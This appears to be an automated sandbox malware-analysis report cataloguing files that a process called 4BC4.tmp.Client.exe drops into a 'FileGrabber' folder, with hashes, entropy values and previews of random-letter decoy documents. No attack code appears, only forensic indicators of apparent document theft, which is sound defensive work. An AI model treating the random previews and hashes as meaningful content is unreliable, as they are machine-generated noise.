BGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\ProgramData\134349\FileGrabber\Documents\XZXHAVGRAG\ONBQCLYSPU.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\ProgramData\134349\FileGrabber\Documents\XZXHAVGRAG\UMMBDNEQBN.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Reputation:	unknown
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\ProgramData\134349\FileGrabber\Documents\XZXHAVGRAG\VLZDGUKUTZ.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Reputation:	unknown
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\ProgramData\134349\FileGrabber\Documents\XZXHAVGRAG\XZXHAVGRAG.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Reputation:	unknown
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\ProgramData\134349\FileGrabber\Documents\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	402
Entropy (8bit):	3.493087299556618
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmUclLwr2FlDmo0IWF9klrgl2FlDmo0qjKAev:QCGwv4o0hlLwiF4o0UUsF4o01AM
MD5:	ECF88F261853FE08D58E2E903220DA14
SHA1:	F72807A9E081906654AE196605E681D5938A2E6C
SHA-256:	CAFEC240D998E4B6E92AD1329CD417E8E9CBD73157488889FD93A542DE4A4844
SHA-512:	82C1C3DD163FBF7111C7EF5043B009DAFC320C0C5E088DEC16C835352C5FFB7D03C5829F65A9FF1DC357BAE97E8D2F9C3FC1E531FE193E84811FB8C62888A36B
Malicious:	false
Reputation:	unknown
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.2.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.5.....

C:\ProgramData\134349\FileGrabber\Downloads\HTAGVDFUIE.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Reputation:	unknown
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\ProgramData\134349\FileGrabber\Downloads\HTAGVDFUIE.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Reputation:	unknown
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\ProgramData\134349\FileGrabber\Downloads\KATAXZVCPS.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Reputation:	unknown
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\ProgramData\134349\FileGrabber\Downloads\KZWFNRXYKI.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694982189683734
Encrypted:	false
SSDEEP:	24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
MD5:	E49F84B05A175C231342E6B705A24A44
SHA1:	41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
SHA-256:	EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
SHA-512:	84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
Malicious:	false
Reputation:	unknown
Preview:	KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

C:\ProgramData\134349\FileGrabber\Downloads\LTKMYBSEYZ.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Reputation:	unknown
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\ProgramData\134349\FileGrabber\Downloads\NIKHQAIQAU.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690394987545919
Encrypted:	false
SSDEEP:	24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
MD5:	CA901F8E74EB7955CF06A00BD424C0C2
SHA1:	0876F92A018E8AB57F666FBB048B1CD028607A38
SHA-256:	6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
SHA-512:	7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
Malicious:	false
Reputation:	unknown
